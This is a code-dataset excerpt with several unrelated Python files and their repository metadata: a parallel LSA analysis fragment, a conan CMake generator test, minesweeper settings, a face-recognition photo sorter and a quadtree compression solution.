array = lsalib.palla_applyAnalysis( first_Data[i], second_Data[j], data, col, onDiag=True, delayLimit=delayLimit,bootNum=bootNum, pvalueMethod=pvalueMethod,
precisionP=precision, fTransform=fTransform, zNormalize=zNormalize, approxVar=approxVar, resultFile=resultFile, trendThresh=trendThresh,
firstFactorLabels=firstFactorLabels, secondFactorLabels=secondFactorLabels, qvalueMethod=qvalueMethod, progressive=progressive)
with h5py.File(merged_filename, 'w') as merged_hf:
merged_hf.create_dataset(f'data_{i}_{j}', data=array)
return 1
pool = multiprocessing.Pool(processes=10)
results = [pool.apply_async(myfun_pall, args=(process_id,)) for process_id in range(len(second_Data))]
for result in results:
a = result.get()
# parallel_obj = Parallel(n_jobs= -1)
# parallel_obj(delayed(myfun_pall)(i) for i in range(0, len(first_Data)))
print("finishing up...", file=sys.stderr)
end_time=time.time()
print("time elapsed %f seconds" % (end_time - start_time), file=sys.stderr)
if __name__=="__main__":
main()
|
foolstars/a_elsa
|
elsa/lsa/ppi.py
|
ppi.py
|
py
| 14,310 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2856076738
|
import re, unittest
from conans.model.settings import Settings
from conans.model.conan_file import ConanFile
from conans.client.generators.cmake import CMakeGenerator
class CMakeGeneratorTest(unittest.TestCase):
def extractMacro(self, name, text):
pattern = ".*(macro\(%s\).*?endmacro\(\)).*" % name
return re.sub(pattern, r"\1", text, flags=re.DOTALL)
def aux_cmake_test_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
generator = CMakeGenerator(conanfile)
aux_cmake_test_setup = generator._aux_cmake_test_setup()
# extract the conan_basic_setup macro
macro = self.extractMacro("conan_basic_setup", aux_cmake_test_setup)
self.assertEqual("""macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_flags_setup()
conan_set_find_paths()
endmacro()""", macro)
# extract the conan_set_find_paths macro
macro = self.extractMacro("conan_set_find_paths", aux_cmake_test_setup)
self.assertEqual("""macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()""", macro)
|
AversivePlusPlus/AversivePlusPlus
|
tools/conan/conans/test/generators/cmake_test.py
|
cmake_test.py
|
py
| 1,364 |
python
|
en
|
code
| 31 |
github-code
|
6
|
23448338775
|
"""
Created on Wed Apr 27 18:09:57 2022
@author: ljhs8
"""
WIDTH = 750
HEIGHT = 600
GRID_SIZE= 9
GRID_WIDTH = 23
GRID_HEIGHT = 17
CELL_COUNT = GRID_HEIGHT*GRID_WIDTH
MINESCOUNT = 45
WHITE = "#C1D4D7"
GREY = "#ABB6B8"
|
Anonymousbowtie/Normal_minesweeper
|
settings.py
|
settings.py
|
py
| 240 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3806456362
|
import pickle, custom_logger
from cmd_parser import parser, createModelString, performSortingString
from asyncio.log import logger
from os.path import isfile
from logging import INFO, DEBUG, WARN
import utils
import logging
args = parser.parse_args()
if args.debug:
custom_logger.initialize_logger(logger_level=DEBUG)
else:
custom_logger.initialize_logger(logger_level=INFO)
if args.mode == createModelString:
if args.name == None:
raise Exception(
"Please provide your name to save your face model with -n or --name"
)
if args.input_type == "image":
actual_images, not_images = utils.get_images_from_folder(args.input_folder)
logging.info(
"Images found in folder (These will be scanned) : {}".format(actual_images)
)
logging.info("Non-Images found in folder : {}".format(not_images))
if len(actual_images) == 0:
raise Exception("No suitable images found in folder provided")
logging.info("Tests passed, starting scan now")
import recognition_engine
actual_images = utils.join_path_list(args.input_folder, actual_images)
encodings = recognition_engine.train_from_images(
actual_images, debug=args.debug
)
logging.debug(encodings)
with open("{}.pkl".format(args.name), "wb") as f:
pickle.dump(encodings, f)
logging.info("Khatam!")
elif args.input_type == "video":
if args.input_file == None:
raise Exception("Please provide a video input file with -i or --input_file")
if not isfile(args.input_file):
raise Exception(
"'{}' is not a valid file. Please provide a valid file".format(
args.input_file
)
)
import recognition_engine
encodings = recognition_engine.train_from_video(
video_path=args.input_file, debug=args.debug
)
with open("{}.pkl".format(args.name), "wb") as f:
pickle.dump(encodings, f)
logging.info("Khatam!")
else:
raise Exception("You need to specify input type with -t or --input_type")
elif args.mode == performSortingString:
if args.name == None:
raise Exception(
"Please provide the name you gave while creating the model with -n or --name"
)
utils.verify_folder(args.input_folder)
images_to_sort, not_to_sort = utils.get_images_from_folder(args.input_folder)
final_paths = utils.join_path_list(args.input_folder, images_to_sort)
encodings = None
try:
with open("{}.pkl".format(args.name), "rb") as f:
encodings = pickle.load(f)
except Exception as E:
logger.critical(E)
exit(1)
found_directory = "found_directory"
not_found_directory = "not_found_directory"
utils.verify_folder(folder_path=found_directory, create=True)
utils.verify_folder(folder_path=not_found_directory, create=True)
threading = False if args.processes == 1 else True
import recognition_engine
recognition_engine.sort_into_directories(
images_to_test=final_paths,
perform_transfer=True,
debug=args.debug,
verbose=True,
threading=False,
target_encodings=encodings,
n_workers=args.processes,
)
logging.info("Khatam!")
logging.info("Ruko zara, sabar kato")
|
jmvaswani/picture-sorter
|
sorter.py
|
sorter.py
|
py
| 3,435 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40732718573
|
n = int(input())
arr=[list(map(str, input().strip())) for i in range(n)]
def check(x,y,n):
color = arr[x][y]
for i in range(x, x+n):
for j in range(y, y+n):
if color != arr[i][j]:
print('(', end='')
check(x, y, n//2)
check(x, y+n//2, n//2)
check(x+n//2, y, n//2)
check(x+n//2, y+n//2, n//2)
print(')', end='')
return
print(color, end='')
check(0,0,n)
|
seriokim/Coding-Study
|
백준 단계별로 풀어보기/분할정복/1992.py
|
1992.py
|
py
| 497 |
python
|
en
|
code
| 0 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.